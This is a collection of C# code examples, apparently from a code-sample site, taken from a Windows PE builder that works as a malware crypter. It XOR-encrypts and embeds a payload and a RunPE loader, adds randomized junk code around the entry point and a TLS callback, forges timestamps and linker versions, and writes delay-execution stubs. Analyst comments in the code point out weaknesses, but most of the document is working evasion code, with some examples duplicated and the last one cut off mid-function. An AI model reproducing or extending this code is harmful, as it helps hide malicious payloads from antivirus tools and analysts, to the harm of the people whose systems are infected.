Esempio n. 1
        /// <summary>
        /// Runs the external compiler at <c>PE.PeDirectory.CompilerPath</c> on <paramref name="PathName"/>
        /// with <c>-f bin</c> output directed to a newly created temp file.
        /// </summary>
        /// <param name="PathName">Source file handed to the compiler.</param>
        /// <param name="PE">Build context supplying the include root and the compiler path.</param>
        /// <returns>The temp-file path, or <c>null</c> when that file does not exist afterwards.</returns>
        /// <remarks>
        /// <c>Path.GetTempFileName()</c> creates the file before the compiler runs, so the existence
        /// check does not by itself show that compilation succeeded. The child is started without a
        /// shell; its stdout is drained and discarded and its exit code is never read.
        /// </remarks>
        public static string CompileArbitrary(string PathName, NewPE PE)
        {
            string outputPath = Path.GetTempFileName();

            ProcessStartInfo startInfo = new ProcessStartInfo
            {
                Arguments = String.Format("-i \"{0}/\" -f bin \"{1}\" -o \"{2}\"",
                                          PE.PeDirectory.RootDirectoryPath,
                                          PathName,
                                          outputPath),
                FileName               = PE.PeDirectory.CompilerPath,
                RedirectStandardOutput = true,
                UseShellExecute        = false
            };

            using (Process compiler = Process.Start(startInfo))
            using (StreamReader compilerOutput = compiler.StandardOutput)
            {
                // Read to end-of-stream so the redirected pipe is emptied; the text is not used.
                compilerOutput.ReadToEnd();
            }

            return File.Exists(outputPath) ? outputPath : null;
        }
Esempio n. 2
        /// <summary>
        /// Fills the size, base-address, entry-point and data-directory fields of the optional header
        /// from the section headers already stored in <paramref name="PE"/>.
        /// </summary>
        /// <param name="PE">Image description whose <c>NtHeader.OptionalHeader</c> is updated in place.</param>
        /// <param name="nCountImportedModules">Not read by the live code; only the commented-out <c>_magic</c> line refers to it.</param>
        /// <remarks>
        /// Every <c>GetSectionByName</c> result is dereferenced without a check, so the ".text",
        /// ".idata" and ".data" headers must already exist. For analysts: the header produced here
        /// always declares a TLS directory, and in the PE format TLS callbacks are invoked by the
        /// loader before <c>AddressOfEntryPoint</c>, so they belong in any triage of such a file.
        /// </remarks>
        public static void CalculateNtHeader(NewPE PE, int nCountImportedModules)
        {
            // Section sizes are rounded up to FileAlignment before being summed.
            PE.NtHeader.OptionalHeader.SizeOfCode = ALIGN_UP(GetSectionByName(".text", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);

            PE.NtHeader.OptionalHeader.SizeOfInitializedData = ALIGN_UP(GetSectionByName(".idata", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment) +
                                                               ALIGN_UP(GetSectionByName(".data", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);

#if TLS
            PE.NtHeader.OptionalHeader.SizeOfInitializedData += ALIGN_UP(GetSectionByName(".bss", PE).VirtualSize, PE.NtHeader.OptionalHeader.FileAlignment);
#endif

            PE.NtHeader.OptionalHeader.BaseOfCode = GetSectionByName(".text", PE).VirtualAddress;
            // NOTE(review): BaseOfData is taken from .idata; the author's own trailing remark questions this.
            PE.NtHeader.OptionalHeader.BaseOfData = GetSectionByName(".idata", PE).VirtualAddress; // .data?

            PE.NtHeader.OptionalHeader.SizeOfHeaders = ALIGN_UP(PE.HeaderSize, PE.NtHeader.OptionalHeader.FileAlignment);
            // Image size = start of the last section + its size rounded up to SectionAlignment.
            PE.NtHeader.OptionalHeader.SizeOfImage   = PE.Sections.Last.Value.VirtualAddress + ALIGN_UP(PE.Sections.Last.Value.VirtualSize, PE.NtHeader.OptionalHeader.SectionAlignment);

            // The entry point is placed SIZE_PRE_EP_FUNCTIONS bytes into .text, not at its start.
            PE.NtHeader.OptionalHeader.AddressOfEntryPoint = (uint)(GetSectionByName(".text", PE).VirtualAddress + PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS);

            //  uint _magic = (uint)((nCountImportedModules + 1) * 20);

            // The import directory is declared as covering the whole .idata section.
            PE.NtHeader.OptionalHeader.ImportDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress;
            PE.NtHeader.OptionalHeader.ImportDirectory.Size           = GetSectionByName(".idata", PE).VirtualSize; // _magic;

            ///            PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.VirtualAddress = GetSectionByName(".idata", PE).VirtualAddress + _magic;
            ///         PE.NtHeader.OptionalHeader.ImportAddressTableDirectory.Size = GetSectionByName(".idata", PE).VirtualSize - _magic;

            // TLS directory: inside .data, at (length of the file at RunPEObjectPath) + 16; size 0x24.
            // NOTE(review): these two assignments run in every build; the #if TLS block below repeats them unchanged.
            PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
            PE.NtHeader.OptionalHeader.TLSDirectory.Size           = 0x24;

#if TLS
            PE.NtHeader.OptionalHeader.TLSDirectory.VirtualAddress = GetSectionByName(".data", PE).VirtualAddress + (uint)PE.PeDirectory.RunPEObjectPath.ReadBytes().Length + 16;
            PE.NtHeader.OptionalHeader.TLSDirectory.Size           = 0x24;
#endif
        }
Esempio n. 3
        /// <summary>
        /// Transforms the file at <c>PE.PeDirectory.RunPEObjectPath</c> in place with a fresh 16-byte key,
        /// writes that key to <c>runpe_key.inc</c> in the include directory, and recompiles the data section.
        /// </summary>
        /// <param name="PE">Build context supplying the object path and the include directory.</param>
        /// <remarks>
        /// For analysts: the key is emitted in clear as an assembler include right next to the data it
        /// protects, so this is obfuscation rather than confidentiality. The key is presumably
        /// assembled into the output image as well — confirm against the include's consumer.
        /// </remarks>
        public static void EncryptCodeAndAddKey(NewPE PE)
        {
            byte[] pKey = new byte[16];
            // Keys.PopulateBuffer is defined elsewhere; presumably it fills the buffer with random bytes — verify.
            Keys.PopulateBuffer(pKey);

            byte[] pRunPE = PE.PeDirectory.RunPEObjectPath.ReadBytes();
            // By its name a XOR transform applied to pRunPE in place (the return value, if any, is not used).
            Xor.EncodeDecodeData(pRunPE, pKey);

            if (File.Exists(PE.PeDirectory.RunPEObjectPath))
            {
                File.Delete(PE.PeDirectory.RunPEObjectPath);
            }

            // Overwrite the object file with the transformed bytes.
            PE.PeDirectory.RunPEObjectPath.WriteFile(pRunPE);

            string KeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_key.inc");
            // Key rendered as assembler source text by the ToASMBuffer extension.
            string Format     = pKey.ToASMBuffer();

            if (File.Exists(KeyInclude))
            {
                File.Delete(KeyInclude);
            }

            File.WriteAllText(KeyInclude, Format);

            PEFactory.CompileDataSection(PE);
        }
Esempio n. 4
        /// <summary>
        /// Writes fixed values into the COFF file header and the optional header of <paramref name="PE"/>.
        /// </summary>
        /// <param name="PE">Image description whose <c>NtHeader</c> is updated in place; <c>PE.Sections</c> must already be populated.</param>
        /// <remarks>
        /// For analysts: apart from the section count, every field set here is a constant or a random
        /// number, so none of it reflects a real build environment. The timestamp and linker version
        /// of files from this builder are not usable as provenance or timeline evidence.
        /// </remarks>
        public static void InitializeNtHeader(NewPE PE)
        {
            // <--- File Header --->
            {
                // 0x14c is IMAGE_FILE_MACHINE_I386 (32-bit x86).
                PE.NtHeader.FileHeader.Machine = 0x14c;
                PE.NtHeader.FileHeader.NumberOfSections = (ushort)PE.Sections.Count;
                // Not a build time: a value from _Random between 0x40000000 and 0x4C000000
                // (Unix seconds falling in 2004-2010; upper bound exclusive if _Random is System.Random).
                PE.NtHeader.FileHeader.TimeDateStamp = (uint)_Random.Next(0x40000000, 0x4C000000);
                PE.NtHeader.FileHeader.PointerToSymbolTable = 0;
                PE.NtHeader.FileHeader.NumberOfSymbols = 0;
                // 0xE0 is the size of a PE32 optional header with 16 data directories.
                PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0;
                // 0x103 = RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE.
                PE.NtHeader.FileHeader.Characteristics = 0x103;
            }

            // <--- Optional Header --->
            {
                // <--- LinkerVersions must match the Rich Signature --->
                PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06;
                PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00;

                PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4;
                PE.NtHeader.OptionalHeader.MajorImageVersion = 4;
                PE.NtHeader.OptionalHeader.MajorSubsystemVersion = 4;

                // Zero leaves the DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP) bits clear.
                PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00;

                PE.NtHeader.OptionalHeader.ImageBase = 0x00400000;
                PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000;
                PE.NtHeader.OptionalHeader.FileAlignment = 0x200;
            }
        }
Esempio n. 5
        /// <summary>
        /// Writes fixed values into the COFF file header and the optional header of <paramref name="PE"/>.
        /// </summary>
        /// <param name="PE">Image description whose <c>NtHeader</c> is updated in place; <c>PE.Sections</c> must already be populated.</param>
        /// <remarks>
        /// For analysts: apart from the section count, every field set here is a constant or a random
        /// number, so none of it reflects a real build environment. The timestamp and linker version
        /// of files from this builder are not usable as provenance or timeline evidence.
        /// </remarks>
        public static void InitializeNtHeader(NewPE PE)
        {
            // <--- File Header --->
            {
                // 0x14c is IMAGE_FILE_MACHINE_I386 (32-bit x86).
                PE.NtHeader.FileHeader.Machine              = 0x14c;
                PE.NtHeader.FileHeader.NumberOfSections     = (ushort)PE.Sections.Count;
                // Not a build time: a value from _Random between 0x40000000 and 0x4C000000
                // (Unix seconds falling in 2004-2010; upper bound exclusive if _Random is System.Random).
                PE.NtHeader.FileHeader.TimeDateStamp        = (uint)_Random.Next(0x40000000, 0x4C000000);
                PE.NtHeader.FileHeader.PointerToSymbolTable = 0;
                PE.NtHeader.FileHeader.NumberOfSymbols      = 0;
                // 0xE0 is the size of a PE32 optional header with 16 data directories.
                PE.NtHeader.FileHeader.SizeOfOptionalHeader = 0xE0;
                // 0x103 = RELOCS_STRIPPED | EXECUTABLE_IMAGE | 32BIT_MACHINE.
                PE.NtHeader.FileHeader.Characteristics      = 0x103;
            }

            // <--- Optional Header --->
            {
                // <--- LinkerVersions must match the Rich Signature --->
                PE.NtHeader.OptionalHeader.MajorLinkerVersion = 0x06;
                PE.NtHeader.OptionalHeader.MinorLinkerVersion = 0x00;

                PE.NtHeader.OptionalHeader.MajorOperatingSystemVersion = 4;
                PE.NtHeader.OptionalHeader.MajorImageVersion           = 4;
                PE.NtHeader.OptionalHeader.MajorSubsystemVersion       = 4;

                // Zero leaves the DYNAMIC_BASE (ASLR) and NX_COMPAT (DEP) bits clear.
                PE.NtHeader.OptionalHeader.DllCharacteristics = 0x00;

                PE.NtHeader.OptionalHeader.ImageBase        = 0x00400000;
                PE.NtHeader.OptionalHeader.SectionAlignment = 0x1000;
                PE.NtHeader.OptionalHeader.FileAlignment    = 0x200;
            }
        }
Esempio n. 6
 /// <summary>
 /// When <paramref name="_RemoveAntiDebug"/> is true, replaces the include file at
 /// <c>PE.PeDirectory.AntiDebugIncPath</c> with an empty file; otherwise does nothing.
 /// </summary>
 /// <param name="PE">Build context that supplies the include path.</param>
 /// <param name="_RemoveAntiDebug">Whether to blank the include.</param>
 public static void RemoveAntiDebug(NewPE PE, bool _RemoveAntiDebug)
 {
     if (!_RemoveAntiDebug)
     {
         return;
     }

     // Delete-then-write leaves a zero-length file where the previous include was.
     File.Delete(PE.PeDirectory.AntiDebugIncPath);
     File.WriteAllText(PE.PeDirectory.AntiDebugIncPath, string.Empty);
 }
Esempio n. 7
        /// <summary>
        /// Rewrites <c>tls_callback.inc</c>, replacing its marker lines with generated filler bytes, then
        /// records the compiled size in <paramref name="JCI"/> and writes <c>payload_address.inc</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory.</param>
        /// <param name="JCI">Size bookkeeping; <c>SIZE_TLS_CALLBACK</c> is written, the other three sizes are read.</param>
        /// <param name="Multiplier">Scales how many generated functions follow a <c>;[JUNK_FUNCS]</c> marker (3x to 5x).</param>
        /// <remarks>
        /// For analysts: filler lengths and counts come from <c>Rand</c>, so these regions are expected
        /// to differ between builds and byte signatures over them are unlikely to be stable.
        /// </remarks>
        public void WriteLogicalTrashToTLSCallback(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
        {
            string TlsCallbackInc  = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback.inc");
            // This first size is overwritten after the rewrite below and never read before that.
            int    sizeOfTLS       = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
            // Accumulated below but not read anywhere in this method.
            int    size_junk_added = 0;

            string[] tls = TlsCallbackInc.ReadLines();

            for (int i = 0; i < tls.Length; i++)
            {
                // The marker line is replaced wholesale by the filler rendered as assembler text.
                if (tls[i].Contains(";[JUNK_NO_PRESERVE]"))
                {
                    int    len_trash    = Rand.Next(0x100, 0x200);
                    byte[] trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
                    size_junk_added += trash_buffer.Length;

                    tls[i] = trash_buffer.ToASMBuffer();

                    trash_buffer = new byte[0];
                    GC.Collect();
                }

                // Here the marker line is kept and the generated functions are appended after it.
                if (tls[i].Contains(";[JUNK_FUNCS]"))
                {
                    int xx = Rand.Next(3 * Multiplier, 5 * Multiplier);

                    for (int jj = 0; jj < xx; jj++)
                    {
                        int    func_len    = Rand.Next(0x100, 0x120);
                        byte[] func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x1000);

                        tls[i] = string.Concat(tls[i], Environment.NewLine, func_buffer.ToASMBuffer(), Environment.NewLine);
                    }
                }
            }

            if (File.Exists(TlsCallbackInc))
            {
                File.Delete(TlsCallbackInc);
            }

            TlsCallbackInc.WriteLines(tls);

            // Re-measure the include now that the markers have been expanded.
            sizeOfTLS             = PEFactory.ComputeArbitrarySize(TlsCallbackInc, PE);
            JCI.SIZE_TLS_CALLBACK = sizeOfTLS + 3; // prologue;

            string AddrPayloadInc = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_address.inc");
            string Format         = "PAYLOAD_ADDRESS EQU 0x{0}";

            // PAYLOAD_ADDRESS is the sum of the four recorded code sizes, as 8 hex digits.
            Format = string.Format(Format, (JCI.SIZE_PRE_EP_FUNCTIONS + JCI.SIZE_TLS_CALLBACK + JCI.SIZE_EP_FUNCTION + JCI.SIZE_POST_EP_FUNCTIONS).ToString("X8"));
            File.WriteAllText(AddrPayloadInc, Format);

            GC.Collect();
        }
Esempio n. 8
        /// <summary>
        /// Transforms the file at <paramref name="BindPath"/> with the key bytes read from
        /// <c>PE.PeDirectory.PayloadKeyIncPath</c>, Base64-encodes the result and writes it to
        /// <c>PE.PeDirectory.BindIncPath</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the key path and the output path.</param>
        /// <param name="BindPath">File whose bytes are transformed and encoded.</param>
        /// <remarks>
        /// For analysts: the key is read from a file on disk rather than generated here, so the bound
        /// file shares its key with whatever wrote that key file; Base64 plus a repeating-key
        /// transform is reversible once the key is recovered.
        /// </remarks>
        public static void EncryptAndEncodeBind(NewPE PE, string BindPath)
        {
            byte[] pKey  = PE.PeDirectory.PayloadKeyIncPath.ReadBytes();
            byte[] pBind = BindPath.ReadBytes();

            // By its name a XOR transform applied to pBind in place — verify against Xor's definition.
            Xor.EncodeDecodeData(pBind, pKey);
            // Base64 text is pure ASCII, so the ASCII encoder is lossless here.
            pBind = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pBind));

            if (File.Exists(PE.PeDirectory.BindIncPath))
            {
                File.Delete(PE.PeDirectory.BindIncPath);
            }

            File.WriteAllBytes(PE.PeDirectory.BindIncPath, pBind);
        }
Esempio n. 9
        /// <summary>
        /// Adds the section headers to <c>PE.Sections</c> in the order .text, .idata, .data and,
        /// when the <c>TLS</c> symbol is defined, .bss.
        /// </summary>
        /// <param name="PE">Image description whose section list is extended.</param>
        /// <remarks>
        /// Only <c>Name</c> and <c>Characteristics</c> are set here; sizes and addresses are left at
        /// their defaults. Names are stored without NUL padding, which the string comparisons in
        /// <c>GetSectionByName</c> rely on.
        /// </remarks>
        public static void InitializeSections(NewPE PE)
        {
            // <--- Text Section --->
            {
                PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER()
                {
                    Name            = new char[] { '.', 't', 'e', 'x', 't' },
                    // CNT_CODE | MEM_EXECUTE | MEM_READ
                    Characteristics = 0x60000020
                };

                // AddFirst keeps .text at the head of the list regardless of what is already there.
                PE.Sections.AddFirst(TextSectionHeader);
            }

            // <--- IData Section --->
            {
                PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER()
                {
                    Name            = new char[] { '.', 'i', 'd', 'a', 't', 'a' },
                    // CNT_INITIALIZED_DATA | MEM_READ
                    Characteristics = 0x40000040
                };

                PE.Sections.AddLast(IDataSectionHeader);
            }

            // <--- Data Section --->
            {
                PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER()
                {
                    Name            = new char[] { '.', 'd', 'a', 't', 'a' },
                    // CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
                    Characteristics = 0xC0000040
                };

                PE.Sections.AddLast(DataSectionHeader);
            }

#if TLS
            // <--- TLS Section --->
            {
                PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER()
                {
                    Name            = new char[] { '.', 'b', 's', 's' },
                    // CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
                    Characteristics = 0xC0000040
                };

                PE.Sections.AddLast(TLSSectionHeader);
            }
#endif
        }
Esempio n. 10
        /// <summary>
        /// Adds the section headers to <c>PE.Sections</c> in the order .text, .idata, .data and,
        /// when the <c>TLS</c> symbol is defined, .bss.
        /// </summary>
        /// <param name="PE">Image description whose section list is extended.</param>
        /// <remarks>
        /// Only <c>Name</c> and <c>Characteristics</c> are set here; sizes and addresses are left at
        /// their defaults. Names are stored without NUL padding, which the string comparisons in
        /// <c>GetSectionByName</c> rely on.
        /// </remarks>
        public static void InitializeSections(NewPE PE)
        {
            // <--- Text Section --->
            {
                PE_SECTION_HEADER TextSectionHeader = new PE_SECTION_HEADER()
                {
                    Name = new char[] { '.', 't', 'e', 'x', 't' },
                    // CNT_CODE | MEM_EXECUTE | MEM_READ
                    Characteristics = 0x60000020
                };

                // AddFirst keeps .text at the head of the list regardless of what is already there.
                PE.Sections.AddFirst(TextSectionHeader);
            }

            // <--- IData Section --->
            {
                PE_SECTION_HEADER IDataSectionHeader = new PE_SECTION_HEADER()
                {
                    Name = new char[] { '.', 'i', 'd', 'a', 't', 'a' },
                    // CNT_INITIALIZED_DATA | MEM_READ
                    Characteristics = 0x40000040
                };

                PE.Sections.AddLast(IDataSectionHeader);
            }

            // <--- Data Section --->
            {
                PE_SECTION_HEADER DataSectionHeader = new PE_SECTION_HEADER()
                {
                    Name = new char[] { '.', 'd', 'a', 't', 'a' },
                    // CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
                    Characteristics = 0xC0000040
                };

                PE.Sections.AddLast(DataSectionHeader);
            }

#if TLS
            // <--- TLS Section --->
            {
                PE_SECTION_HEADER TLSSectionHeader = new PE_SECTION_HEADER()
                {
                    Name = new char[] { '.', 'b', 's', 's' },
                    // CNT_INITIALIZED_DATA | MEM_READ | MEM_WRITE
                    Characteristics = 0xC0000040
                };

                PE.Sections.AddLast(TLSSectionHeader);
            }
#endif
        }
Esempio n. 11
        /// <summary>
        /// Writes <c>runpe_length.inc</c>, defining <c>RUNPE_CODE_LENGTH</c> as the byte length of the file
        /// at <c>PE.PeDirectory.RunPEObjectPath</c>, then recompiles the text section.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory and the object path.</param>
        public static void FixDecryptorLoop(NewPE PE)
        {
            string RunPELengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "runpe_length.inc");

            string Format = "RUNPE_CODE_LENGTH EQU 0x{0}";

            if (File.Exists(RunPELengthInclude))
            {
                File.Delete(RunPELengthInclude);
            }

            // The length is emitted as 8 upper-case hex digits; the object file is read in full just to measure it.
            Format = string.Format(Format, PE.PeDirectory.RunPEObjectPath.ReadBytes().Length.ToString("X8"));

            File.WriteAllText(RunPELengthInclude, Format);
            PEFactory.CompileTextSection(PE);
        }
Esempio n. 12
        /// <summary>
        /// Rewrites the include at <c>PE.PeDirectory.DelayExecutionIncPath</c>: every <c>0x69</c> placeholder is
        /// replaced by a random 8-digit hex number and every <c>;[JUNK_NO_PRESERVE]</c> line by generated filler.
        /// </summary>
        /// <param name="PE">Build context supplying the include path.</param>
        /// <param name="bLong">Selects the number range: 25 to 50 when false, 17,500,000 to 30,000,000 when true.</param>
        /// <remarks>
        /// NOTE(review): apart from that number range, both <paramref name="bLong"/> branches are identical.
        /// The include's name suggests the number is a delay-loop count — confirm against the .inc source.
        /// </remarks>
        public void WriteDelayExecutionTrash(xNewPE PE, bool bLong)
        {
            string[] olaf = PE.PeDirectory.DelayExecutionIncPath.ReadLines();

            byte[] trash_buffer;

            // One filler buffer is generated up front and reused for every marker line below.
            if (!bLong)
            {
                int len_trash = Rand.Next(0x100, 0x120);
                trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            }
            else
            {
                int len_trash = Rand.Next(0x100, 0x120);
                trash_buffer = GenerateLogicalTrash(len_trash, 0, 0, 0, 0);
            }

            for (int i = 0; i < olaf.Length; i++)
            {
                // String.Replace substitutes every occurrence of the placeholder on the line.
                if (olaf[i].Contains("0x69"))
                {
                    if (!bLong)
                    {
                        olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(25, 50).ToString("X8")));
                    }
                    else
                    {
                        olaf[i] = olaf[i].Replace("0x69", string.Format("0x{0}", Rand.Next(3500000 * 5, 6000000 * 5).ToString("X8")));
                    }
                }

                // The marker line is replaced wholesale by the filler rendered as assembler text.
                if (olaf[i].Contains(";[JUNK_NO_PRESERVE]"))
                {
                    if (!bLong)
                    {
                        olaf[i] = trash_buffer.ToASMBuffer();
                    }
                    else
                    {
                        olaf[i] = trash_buffer.ToASMBuffer();
                    }
                }
            }

            File.Delete(PE.PeDirectory.DelayExecutionIncPath);
            PE.PeDirectory.DelayExecutionIncPath.WriteLines(olaf);
        }
Esempio n. 13
        /// <summary>
        /// Writes <c>tls_callback_offset.inc</c>, defining <c>TLS_CALLBACK_OFFSET</c> as
        /// <c>SIZE_PRE_EP_FUNCTIONS + SIZE_EP_FUNCTION</c>, then recompiles the data section.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory and the recorded sizes.</param>
        public static void ConstructTLSCallback(NewPE PE)
        {
            string TLSOffsetInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "tls_callback_offset.inc");

            string Format = "TLS_CALLBACK_OFFSET EQU 0x{0}";


            if (File.Exists(TLSOffsetInclude))
            {
                File.Delete(TLSOffsetInclude);
            }

            // The offset is emitted as 8 upper-case hex digits.
            Format = string.Format(Format, (PE.JunkInfo.SIZE_PRE_EP_FUNCTIONS + PE.JunkInfo.SIZE_EP_FUNCTION).ToString("X8"));

            // The file was deleted just above, so this append produces a file holding only this line.
            File.AppendAllText(TLSOffsetInclude, Format);

            PEFactory.CompileDataSection(PE);
            //PEFactory.CompileTLSSection(PE);
        }
Esempio n. 14
        /// <summary>
        /// Appends to the main assembler file at <c>PE.PeDirectory.MainPath</c> an alignment directive and then,
        /// for each section, a label, an <c>incbin</c> of that section's object file and another alignment directive.
        /// </summary>
        /// <param name="PE">Build context supplying the main file path, the section list and <c>FileAlignment</c>.</param>
        /// <remarks>
        /// NOTE(review): <c>GetObjPathFromSectionName</c> can return null when no object file matches;
        /// the result is passed to <c>Path.GetFileName</c> unchecked, so the emitted <c>incbin</c> path would then
        /// be just <c>obj/</c> — verify that callers compile every section first.
        /// </remarks>
        public static void AddSectionDatas(NewPE PE)
        {
            File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
            // Pad with zero bytes up to the next FileAlignment boundary.
            File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
            File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);

            foreach (PE_SECTION_HEADER SectionHeader in PE.Sections)
            {
                // Label is the section name without its leading dot, upper-cased, e.g. ".text" gives "TEXT:".
                string WriteableName = string.Concat(new string(SectionHeader.Name).TrimStart('.').ToUpper(), ":");

                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, WriteableName);
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, string.Format(
                                       "\tincbin \"obj/{0}\"",
                                       Path.GetFileName(GetObjPathFromSectionName(new string(SectionHeader.Name), PE))));
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
                File.AppendAllText(PE.PeDirectory.MainPath, string.Format("align 0x{0}, db 0", PE.NtHeader.OptionalHeader.FileAlignment.ToString("X8")));
                File.AppendAllText(PE.PeDirectory.MainPath, Environment.NewLine);
            }
        }
Esempio n. 15
        /// <summary>
        /// Transforms the file at <paramref name="PayloadPath"/> with a fresh 16-byte key, Base64-encodes it, and
        /// writes three files into the include directory: <c>payload_length.inc</c>, <c>payload_key.bin</c>
        /// and <c>payload.bin</c>.
        /// </summary>
        /// <param name="PE">Build context supplying the include directory.</param>
        /// <param name="PayloadPath">File whose bytes are transformed and encoded.</param>
        /// <remarks>
        /// For analysts: the key is written unprotected to <c>payload_key.bin</c> beside the encoded data, so
        /// the original bytes are recoverable by anyone holding both; treat this as obfuscation, not encryption.
        /// </remarks>
        public static void EncryptAndEncodePayload(NewPE PE, string PayloadPath)
        {
            byte[] pKey = new byte[16];
            // Keys.PopulateBuffer is defined elsewhere; presumably it fills the buffer with random bytes — verify.
            Keys.PopulateBuffer(pKey);

            byte[] pFileBuffer = PayloadPath.ReadBytes();
            // By its name a XOR transform applied to pFileBuffer in place — verify against Xor's definition.
            Xor.EncodeDecodeData(pFileBuffer, pKey);

            // Base64 text is pure ASCII, so the ASCII encoder is lossless here.
            pFileBuffer = new ASCIIEncoding().GetBytes(Convert.ToBase64String(pFileBuffer));

            string PayloadLengthInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_length.inc");
            string Format = "PAYLOAD_LENGTH EQU 0x{0}";

            // PAYLOAD_LENGTH is the length of the Base64 text, not of the original file.
            Format = string.Format(Format, pFileBuffer.Length.ToString("X8"));

            if (File.Exists(PayloadLengthInclude))
            {
                File.Delete(PayloadLengthInclude);
            }

            File.WriteAllText(PayloadLengthInclude, Format);

            string PayloadKeyInclude = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload_key.bin");
            string PayloadInclude    = Path.Combine(PE.PeDirectory.IncludeDirectory, "payload.bin");

            if (File.Exists(PayloadKeyInclude))
            {
                File.Delete(PayloadKeyInclude);
            }

            if (File.Exists(PayloadInclude))
            {
                File.Delete(PayloadInclude);
            }

            File.WriteAllBytes(PayloadKeyInclude, pKey);
            File.WriteAllBytes(PayloadInclude, pFileBuffer);
        }
Esempio n. 16
 /// <summary>
 /// Returns the first file in <c>PE.PeDirectory.ObjDirectory</c> whose name without extension equals
 /// <paramref name="Name"/> with its leading and trailing dots removed.
 /// </summary>
 /// <param name="Name">Section name, e.g. ".text".</param>
 /// <param name="PE">Build context supplying the object directory.</param>
 /// <returns>The matching path, or <c>null</c> when no file matches.</returns>
 private static string GetObjPathFromSectionName(string Name, NewPE PE)
 {
     string[] objectFiles = Directory.GetFiles(PE.PeDirectory.ObjDirectory);

     return objectFiles.FirstOrDefault(candidate => Path.GetFileNameWithoutExtension(candidate) == Name.Trim('.'));
 }
Esempio n. 17
        /// <summary>
        /// Inserts generated byte blocks into the text-section source at the <c>;[PRE_EP_FUNCTIONS]</c>,
        /// <c>;[EP_FUNCTION]</c> and <c>;[POST_EP_FUNCTIONS]</c> markers and records the inserted sizes in
        /// <paramref name="JCI"/>.
        /// </summary>
        /// <param name="PE">Build context supplying the text-section source path.</param>
        /// <param name="JCI">Receives <c>SIZE_PRE_EP_FUNCTIONS</c>, <c>SIZE_EP_FUNCTION</c> and <c>SIZE_POST_EP_FUNCTIONS</c>.</param>
        /// <param name="Multiplier">Scales the number of blocks inserted before and after the entry point (5x to 10x each).</param>
        /// <remarks>
        /// The markers stay in the text; each block is inserted in front of its marker, so blocks end
        /// up in generation order. For analysts: block count, length and kind are all drawn from
        /// <c>Rand</c>, so the code around the entry point is expected to differ from build to build.
        /// </remarks>
        public void WriteLogicalFunctionsToTextSection(xNewPE PE, ref JunkCodeInfo JCI, int Multiplier)
        {
            string TxtSect = PE.PeDirectory.TextSectionPath.ReadText();

            int size_pre_ep  = 0;
            int size_ep      = 0;
            int size_post_ep = 0;

            int pre_ep_func_cnt  = Rand.Next(5 * Multiplier, 10 * Multiplier);
            int post_ep_func_cnt = Rand.Next(5 * Multiplier, 10 * Multiplier);

            //   pre - ep
            for (int i = 0; i < pre_ep_func_cnt; i++)
            {
                int index_of = TxtSect.IndexOf(";[PRE_EP_FUNCTIONS]");
                if (index_of > -1)
                {
                    int func_len = Rand.Next(0x120, 0x200);

                    byte[] func_buffer;

                    // Roughly half the blocks come from DataConstructor.GenData, the rest from GenerateLogicalFunction.
                    if (Rand.NextDouble() >= 0.5)
                    {
                        func_buffer = new DataConstructor().GenData(func_len, func_len);
                    }
                    else
                    {
                        func_buffer = GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
                    }

                    // GenerateLogicalFunction(func_len, 0, 0, 0, 0);//GenerateLogicalFunction(func_len, 0, 1, IMAGE_BASE + 0x1000, 0x100000);
                    // Console.WriteLine("Entropy Func: {0}", calc_entropy(func_buffer));

                    // pad entropy with zeros after func
                    //int pad_len = Rand.Next(0x10, 0x25);
